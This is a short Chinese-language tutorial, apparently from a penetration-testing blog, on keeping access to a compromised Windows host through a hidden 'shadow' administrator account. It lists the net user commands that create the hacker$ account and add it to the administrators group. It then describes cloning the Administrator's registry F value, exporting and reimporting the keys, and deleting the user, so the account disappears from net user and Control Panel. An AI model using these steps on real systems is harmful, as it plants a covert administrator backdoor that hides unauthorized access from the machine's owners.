1.认识影子用户

影子用户通常指的是那些在系统用户列表中不可见，但在某些情况下可以进行操作的用户。

在内网渗透过程中，当我们拿到shell时，肯定要进行权限维持，影子用户就是在用户不知情的状态下，创建一个具有管理员权限的用户

2.创建隐藏账户并加入管理员组

net user hacker$ 123qaz@WSX /add
net localgroup administrators hacker$ /add                     将hacker用户添加到管理员组

3.修改注册表

win+r:regedit------->打开注册表
修改权限

找到对应的类型

administrator:1F4
hacker$:3e9

复制1F4中F的值，粘贴到3E9的F中

将00003e9导出为1.reg,hacker$导出为2.reg

3.删除用户

net user hacker$ /del

按顺序点击1.reg和2.reg文件，重新导入

4.添加管理员权限

至此：控制面板看不到。net user看不到。 本地用户组看不到，但是注册表还是可以看到的